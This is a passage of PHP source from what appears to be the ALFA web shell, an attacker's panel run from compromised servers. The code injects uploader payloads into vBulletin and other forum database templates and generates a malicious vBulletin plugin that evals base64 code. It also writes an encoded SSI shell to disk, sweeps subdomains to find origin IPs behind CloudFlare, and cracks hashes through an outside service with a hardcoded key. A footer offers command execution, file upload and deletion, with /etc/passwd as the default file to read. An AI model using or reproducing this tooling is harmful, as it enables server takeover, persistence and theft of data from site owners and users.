  2624. $prefix = $_POST['alfa10'];
  2625. $method = $_POST['alfa4'];
  2626. $shellCode = "{\${".ALFA_UPLOADER."}}";
  2627. $newinshell = str_replace("'","\'",$shellCode);
  2628. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
  2629. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  2630. $inject = "select template from {$prefix}templates where  title= 'calendar'";
  2631. $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
  2632. $GetTemp = mysqli_fetch_assoc($result);
  2633. $saveDate = $GetTemp['template'];
  2634. $repsave = str_replace($shellCode,"",$saveDate);
  2635. $repsave = str_replace("'","\'",$repsave);
  2636. $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
  2637. $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
  2638. $geturl = "select value from {$prefix}settings where name= 'bburl'";
  2639. $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
  2640. $rowb = mysqli_fetch_assoc($findurl);
  2641. $furl = $rowb['value'];
  2642. $realurl = parse_url($furl,PHP_URL_HOST);
  2643. $realpath = parse_url($furl,PHP_URL_PATH);
  2644. $res = false;
  2645. $AlfaCurl = new AlfaCURL();
  2646. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
  2647. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2648. @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
  2649. @fputs($fsock, "HOST: $realurl\r\n");
  2650. @fputs($fsock, "Connection: close\r\n\r\n");
  2651. $check = fgets($fsock);
  2652. if(preg_match("/200 OK/i",$check)){
  2653. $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
  2654. $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
  2655. @fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
  2656. $AlfaCurl->Send($realurl.$realpath."/calendar.php");
  2657. $res = true;
  2658. }
  2659. if($res){
  2660. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2661. output($ff);
  2662. }else{
  2663. $ff = 'http://'.$realurl.$realpath."/calendar.php";
  2664. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2665. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
  2666. }}}}
  2667. if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
  2668. AlfaNum(1,2,7,9,10);
  2669. echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
  2670. $table = array('td1' =>
  2671.  array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2672.  'td2' =>
  2673.  array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
  2674.  'td3' =>
  2675.  array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
  2676.  'td4' =>
  2677.  array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
  2678.  'td5' =>
  2679.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
  2680. );
  2681. create_table($table);
  2682. echo $selector;
  2683. echo '<p><input type="submit" value=" " /></p></form></center>';
  2684. if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
  2685. $method = $_POST['alfa8'];
  2686. $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
  2687. $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
  2688. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
  2689. $recivedata = @mysqli_query($conn,$rec);
  2690. $getd = @mysqli_fetch_assoc($recivedata);
  2691. $savetoass = $getd['template'];
  2692. $code = str_replace("'","\'",$code);
  2693. $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
  2694. $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
  2695. $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
  2696. $getval = @mysqli_fetch_assoc($geturl);
  2697. $saveval = $getval['value'];
  2698. $realurl = parse_url($saveval,PHP_URL_HOST);
  2699. $realpath = parse_url($saveval,PHP_URL_PATH);
  2700. $res = false;
  2701. $AlfaCurl = new AlfaCURL();
  2702. if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
  2703. if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2704. @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
  2705. @fputs($fsock, "HOST: $realurl\r\n");
  2706. @fputs($fsock, "Connection: close\r\n\r\n");
  2707. $check = fgets($fsock);
  2708. if(preg_match("/200 OK/i",$check)){
  2709. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2710. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2711. $res = true;
  2712. }
  2713. @fclose($fsock);
  2714. }
  2715. }elseif(function_exists('curl_version') && $method == 'auto'){
  2716. $AlfaCurl->Send($realurl.$realpath."/faq.php");
  2717. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2718. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2719. $res = true;
  2720. }
  2721. if($res){
  2722. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2723. output($ff);
  2724. }else{
  2725. $ff = 'http://'.$realurl.$realpath."/faq.php";
  2726. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2727. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
  2728. echo '</div>';
  2729. alfafooter();
  2730. }
  2731. function alfaupdatepath(){
  2732.     if($_POST['path']!=''){
  2733.         $_SESSION[__LAST_CWD__] = $_POST['path'];
  2734.     }
  2735.     echo($_SESSION[__LAST_CWD__]);
  2736. }
  2737. function alfacheckfiletype(){
  2738.     $path = $_POST['path'];
  2739.     $arg = $_POST['arg'];
  2740.     if(@is_file($path.'/'.$arg)){
  2741.         echo("file");
  2742.     }else{
  2743.         echo("dir");
  2744.     }
  2745. }
  2746. function alfacheckupdate(){
  2747.     if(!isset($_COOKIE['alfa_checkupdate'])){
  2748.         if(function_exists("curl_version")){
  2749.             $update = new AlfaCURL();
  2750.             $json = $update->Send("http://solevisible.com/update.json");
  2751.             $json = @json_decode($json);
  2752.             if($json){
  2753.                 if(__ALFA_VERSION__ != $json->version){
  2754.                     @setcookie("alfa_checkupdate", "1", time()+86400);
  2755.                     echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
  2756.                 }
  2757.             }
  2758.         }
  2759.     }
  2760. }
  2761. function alfaWriteTocgiapi($name, $source){
  2762.     @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
  2763.     @mkdir('alfacgiapi',0755);
  2764.     __write_file("alfacgiapi/".$name, __get_resource($source));
  2765.     @chmod("alfacgiapi/".$name, 0755);
  2766. }
  2767. function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
  2768. function alfaupdateheader(){
  2769.     if(!isset($_SESSION["updateheader_data"])){
  2770.         $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
  2771.         $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
  2772.         alfaWriteTocgiapi("getheader.alfa",$bash);
  2773.         $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
  2774.         if(@is_array(@json_decode($data,true))){
  2775.             $_SESSION["updateheader_data"] = $data;
  2776.             echo $data;
  2777.         }
  2778.     }else{
  2779.         echo $_SESSION["updateheader_data"];
  2780.     }
  2781. }
  2782. function alfassiShell(){
  2783. alfahead();
  2784. echo '<div class=header>';
  2785. @mkdir('alfa_shtml',0755);
  2786. @chdir('alfa_shtml');
  2787. alfacgihtaccess('shtml');
  2788. $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
  2789. @__write_file('alfa_ssi.shtml',__get_resource($code));
  2790. @chmod("alfa_ssi.shtml",0755);
  2791. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
  2792. echo '</div>';
  2793. alfafooter();
  2794. }
  2795. function alfacloudflare(){
  2796. alfahead();
  2797. AlfaNum(8,9,10,7,6,5,4,3);
  2798. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
  2799. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
  2800. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  2801. $url = $_POST['alfa1'];
  2802. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  2803. $url = preg_replace('/^(https?):\/\//', '', $url);
  2804. $url = "http://www.".$url;
  2805. }
  2806. $headers = @get_headers($url, 1);
  2807. $server = $headers['Server'];
  2808. $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
  2809. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
  2810. if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
  2811. $url = explode($matches[0], $url);
  2812. $url = $url[1];}}
  2813. if(is_array($server))$server = $server[0];
  2814. echo __pre();
  2815. if(preg_match('/cloudflare/i', $server))
  2816. echo "\n[+] CloudFlare detected: {$server}\n<br>";
  2817. else
  2818. echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  2819. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  2820. echo "[+] Searching for more IP addresses.\n\n<br><br>";
  2821. for($x=0;$x<count($subs);$x++){
  2822. $site = $subs[$x] . $url;
  2823. $ip = is_ipv4(gethostbyname($site));
  2824. if($ip == '(Null)')
  2825. continue;
  2826. echo "Trying {$site}: {$ip}\n<br>";
  2827. }
  2828. echo "\n[+] Finished.\n<br>";
  2829. }
  2830. echo '</div>';
  2831. alfafooter();
  2832. }
  2833. function is_ipv4($ip){
  2834. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
  2835. }
  2836. function __alert($s){
  2837. echo '<center>'.__pre().$s.'</center>';
  2838. }
  2839. function create_table($data){
  2840. echo '<table border="1">';
  2841. foreach ($data as $key => $val){
  2842. $array = array();
  2843. foreach($val as $k => $v){
  2844. $array[$k] = $v;
  2845. }
  2846. echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
  2847. }
  2848. echo '</table>';
  2849. }
  2850. function alfaphp2xml(){
  2851. alfahead();
  2852. AlfaNum(8,9,10,7,6,5,4,3);
  2853. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
  2854. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
  2855. <input type='submit' name='go' value=' ' /></p></form></center>";
  2856. if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
  2857. echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
  2858. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
  2859. echo '</textarea></center></p>';
  2860. }
  2861. echo '</center></div>';
  2862. alfafooter();
  2863. }
  2864. function alfacpcrack(){
  2865. alfahead();
  2866. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
  2867. if($_POST['alfa1']=='dec'){
  2868. $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
  2869. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
  2870. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
  2871. foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
  2872. echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2873. if($_POST['alfa3'] == '>>'){
  2874. $hash = $_POST['alfa2'];
  2875. if(!empty($hash)){
  2876. $hash_type = $_POST['alfa4'];
  2877. $email = "solevisible@gmail.com";
  2878. $code = "7b9fa79f92c3cd96";
  2879. $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
  2880. $resp = @file_get_contents($target);
  2881. if($resp==''){
  2882. $get = new AlfaCURL();
  2883. $resp = $get->Send($target);
  2884. }
  2885. echo __pre().'<center>';
  2886. switch($resp){
  2887.     case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
  2888.     case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
  2889.     case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
  2890.     case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
  2891. }
  2892. if(substr($resp,0,4)!='CODE'&&$resp!=''){
  2893. echo "<b>Result: <font color='green'>".$resp."</font></b>";
  2894. }elseif(substr($resp,0,4)!='CODE'){
  2895. echo "<font color='red'>NoT Found</font><br />";
  2896. }
  2897. echo('</center>');
  2898. }
  2899. }
  2900. }
  2901. if($_POST['alfa1']=='analyzer'){
  2902. echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
  2903. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
  2904. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2905. if($_POST['alfa3'] == '>>'){
  2906. $hash = $_POST['alfa2'];
  2907. if(!empty($hash)){
  2908. $curl = new AlfaCURL();
  2909. $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
  2910. echo(__pre().'<center>');
  2911. if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
  2912.     echo('<font color="green">'.$s[1].'</font>');
  2913. }else{
  2914.     echo('<font color="red">Not Found...!</font>');
  2915. }
  2916. echo('</center><br>');
  2917. }
  2918. }
  2919. }
  2920. echo '</div>';
  2921. alfafooter();
  2922. }
  2923. function alfafooter(){
  2924. if(!isset($_POST['ajax'])){
  2925. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
  2926. <tr>
  2927. <td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
  2928. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
  2929. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
  2930. <td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
  2931. </tr>
  2932. <tr>
  2933. <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
  2934. <td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
  2935. </tr>
  2936. <tr>
  2937. <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
  2938. </tr>
  2939. <tr>
  2940. <td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
  2941. <input type='hidden' name='a' value='FilesMAn'>
  2942. <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
  2943. <input type='hidden' name='alfa1' value='uploadFile'>
  2944. <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  2945. <span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span></td>
  2946. </tr>
  2947. </table>
  2948. </div>
  2949. <div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
  2950. <div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
  2951. <div id='update-content'></div>
  2952. <div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
  2953. <div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
  2954. <script>
  2955.     $('search-input').addEventListener('keydown', function(e){
  2956.         setTimeout(function(){
  2957.             var string = $('search-input').value
  2958.             d.getElementsByClassName('history-list')[0].innerHTML = '';
  2959.             for(var i in editor_files){
  2960.                 if(editor_files[i].file.search(string) != -1 || string == ''){
  2961.                     var mode = 0;
  2962.                     if(i == editor_current_file){
  2963.                         mode = ' is_active';
  2964.                     }
  2965.                     insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
  2966.                 }
  2967.             }
  2968.         }, 100);
  2969.     },false);
  2970.     _Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
  2971.         d.body.insertAdjacentHTML('beforeend', res);
  2972.     });
  2973.     if(".$GLOBALS["need_to_update_header"]."){
  2974.         _Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
  2975.             try{
  2976.                 var data = JSON.parse(res);
  2977.                 console.log(data);
  2978.                 for(var i in data){
  2979.                     var html = '';
  2980.                     for(var b = 0; b < data[i].length; b++){
  2981.                         if(i=='useful'||i=='downloader'){
  2982.                             html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
  2983.                         }else{
  2984.                             html += data[i][b];
  2985.                         }
  2986.                     }
  2987.                     var elem = $('header_'+i);
  2988.                     if(elem){elem.innerHTML = html;}
  2989.                 }
  2990.                 $('header_cgishell').innerHTML = 'ON';
  2991.                 $('header_cgishell').setAttribute('class', 'header_on');
  2992.             }catch(e){console.log(e)}
  2993.         });
  2994.     }else if(islinux){
  2995.         _Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
  2996.             if(res=='ok'){
  2997.                 $('header_cgishell').innerHTML = 'ON';
  2998.                 $('header_cgishell').setAttribute('class', 'header_on');
  2999.             }
  3000.         });
  3001.     }
  3002. </script>
  3003. </body>
  3004. </html>
  3005. ";
  3006. }}
  3007. if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
  3008. function posix_getpwuid($p) {return false;} }
  3009. if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
  3010. function posix_getgrgid($p) {return false;} }
  3011. function alfaWhich($p) {
  3012. $path = alfaEx('which ' . $p,false,false);
  3013. if(!empty($path))
  3014. return strlen($path);
  3015. return false;
  3016. }
  3017. function alfaSize($s) {
  3018. if($s >= 1073741824)
  3019. return sprintf('%1.2f', $s / 1073741824 ). ' GB';
  3020. elseif($s >= 1048576)
  3021. return sprintf('%1.2f', $s / 1048576 ) . ' MB';
  3022. elseif($s >= 1024)
  3023. return sprintf('%1.2f', $s / 1024 ) . ' KB';
  3024. else
  3025. return $s . ' B';
  3026. }
  3027. function alfaPerms($p) {
  3028. if (($p & 0xC000) == 0xC000)$i = 's';
  3029. elseif (($p & 0xA000) == 0xA000)$i = 'l';
  3030. elseif (($p & 0x8000) == 0x8000)$i = '-';
  3031. elseif (($p & 0x6000) == 0x6000)$i = 'b';
  3032. elseif (($p & 0x4000) == 0x4000)$i = 'd';
  3033. elseif (($p & 0x2000) == 0x2000)$i = 'c';
  3034. elseif (($p & 0x1000) == 0x1000)$i = 'p';
  3035. else $i = 'u';
  3036. $i .= (($p & 0x0100) ? 'r' : '-');
  3037. $i .= (($p & 0x0080) ? 'w' : '-');
  3038. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
  3039. $i .= (($p & 0x0020) ? 'r' : '-');
  3040. $i .= (($p & 0x0010) ? 'w' : '-');
  3041. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
  3042. $i .= (($p & 0x0004) ? 'r' : '-');
  3043. $i .= (($p & 0x0002) ? 'w' : '-');
  3044. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
  3045. return $i;
  3046. }
  3047. function alfaPermsColor($f,$isbash=false){
  3048. $class = "";
  3049. $num = "";
  3050. $human = "";
  3051. if($isbash){
  3052. $class = $f["class"];
  3053. $num = $f["num"];
  3054. $human = $f["human"];
  3055. }else{
  3056. $num = substr(sprintf('%o', @fileperms($f)),-4);
  3057. $human = alfaPerms(@fileperms($f));
